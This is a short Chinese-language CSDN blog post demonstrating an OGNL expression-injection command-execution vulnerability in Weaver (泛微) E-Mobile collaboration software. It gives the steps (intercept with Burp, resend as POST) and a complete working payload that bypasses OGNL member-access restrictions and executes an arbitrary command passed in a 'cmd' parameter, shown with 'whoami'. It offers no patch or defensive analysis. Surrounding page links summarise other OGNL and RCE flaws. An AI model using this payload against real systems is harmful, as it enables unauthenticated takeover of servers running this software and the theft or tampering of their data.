泛微 E-Mobile Ognl 表达式注入

最新推荐文章于 2023-08-23 14:40:32 发布
最新推荐文章于 2023-08-23 14:40:32 发布
阅读量3.9k 收藏 3
点赞数 2
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51747642/article/details/119251194
版权
泛微E-Mobile协同商务软件存在命令执行安全漏洞,攻击者可通过修改POST请求头利用Ognl表达式注入执行任意命令,获取服务器权限。详细步骤包括使用bp抓包并重发,通过特定代码触发命令执行,如执行'whoami'命令。
摘要由CSDN通过智能技术生成

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

 使用bp抓包

 发送到重发器更改请求头为POST

一执行下面面的代码就直接执行命令了 

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

Erika~
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0day 泛微E-Mobile 6.0 存在命令执行
失心少年
08-01 1047
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令执行,从而获取服务器的执行权限。
泛微E-Mobile installOperate.do SSRF漏洞复现
最新发布
0xSec
07-23 2186
泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)
Brucetg的博客
06-06 4453
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
Java表达式注入OGNL 表达式注入
GalaxySpaceX的博客
08-23 2087
Java表达式注入OGNL 表达式注入
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
热爱学习,喜欢折腾!
10-09 1807
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134,漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。
Confluence OGNL 注入 (CVE-2022-26134)
weixin_47515220的博客
09-26 1803
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
OGNL 表达式
m0_49261516的博客
10-09 8476
mybatis的OGNL表达式
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
struts2-OGNL表达式测试
09-28
struts2-OGNL表达式测试代码
ognl表达式java使用案例详解(测试通过)
01-09
本案例提供ognl使用详解,测试通过,只需解压放入自己WEB项目中,执行struts_ognl包内java文件即可(未提供jia包,若需要可以联系留言发至邮箱),若测试不好可以联系本人提供指导. Struts 2默认的表达式语言是OGNL,原因是它相对其它表达式语言具有下面几大优势: 1、 支持对象方法调用,如xxx.doSomeSpecial(); 2、支持类静态的方法调用和值访问,表达式的格式为@[类全名(包括包路径)]@[方法名 | 值名],例如:@java.lang.String@format('foo %s', 'bar')或@tutorial.MyConstant@APP_NAME; 3、支持赋值操作和表达式串联 4、访问OGNL上下文(OGNL context)和ActionContext 5、操作集合对象 用法:OGNL是通常要结合Struts 2的标志一起使用。主要是#、%和$这三个符号的使用;
泛微E-cology8管理员后端维护手册全套
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为现代企业管理设计,提供全面的后端维护支持。这套“泛微E-cology8管理员后端维护手册全套”涵盖了OA系统中所有后端模块的详细操作和维护指南,旨在帮助...
OGNL表达式
低头低啊低的博客
08-10 185
访问静态方法的方式:@全类名@静态方法名     struts2的框架默认是禁用静态方法调用的。我们可以通过配置开启。     struts.ognl.allowStaticMethodAccess=false把它改为true    --%>
Ognl表达式内部原理---总结
Elvis的专栏
08-26 953
Ognl有一个上下文概念,说白了上下文就是一个Map结构,它实现了java.Util.Map接口,在Struts2中上下文的实现为ActionContext,下面为上下文的结构示意图         OgnlContext                   当Struts接受一个请求时,会迅速创建ActionContext
OGNL表达式的使用
烟雨青山
12-08 1609
1.OGNL技术的使用      1).什么是OGNL     源于ognl.jar工具包     Object Graphics Navigation Language(对象图导航语言)    主要用于访问对象的数据和方法。     2).OGNL基本原理      OGNL工具主要由3部分构成,具体如下      a.OGNL引擎          负责解析ONGL表达式
曲速未来 消息:使用污点跟踪在Apache Struts中发现OGNL注入
WarpFuture的博客
09-25 578
区块链安全咨询公司 曲速未来 表示:在这篇文章中,详细地介绍漏洞的发现,并准确显示远程用户从http请求输入的结果如何被评估为OGNL表达式。   Struts的架构   首先,我将简要介绍Struts如何处理http请求。下图所示: ​ ​ 粗略地讲,当Struts的收到一个HTTP请求,它会先使用预配置ActionMapper来构造ActionMapping,其包含诸如nam...
『Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1167
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入
泛微e-mobile 6.6 rce
12-06
泛微e-mobile 6.6是泛微公司旗下的移动办公平台产品,RCE是远程命令执行的缩写。泛微e-mobile 6.6 RCE指的是在该版本的移动办公平台中存在远程命令执行漏洞。 该漏洞可能导致攻击者可以远程执行恶意命令,从而获取系统权限,并可能对系统进行篡改、数据泄露或者其他恶意攻击行为。 对于泛微e-mobile 6.6 RCE漏洞的解决方案,泛微公司应该及时发布安全补丁,并提醒用户及时更新到最新版本,以避免遭受潜在的安全威胁。同时,用户也应该加强系统的安全防护措施,定期进行安全漏洞扫描和修复,避免遭受潜在的攻击。 总之,泛微e-mobile 6.6 RCE漏洞的存在提醒我们在使用移动办公平台时要重视系统安全,及时关注厂商发布的安全更新,保护自己的系统和数据安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值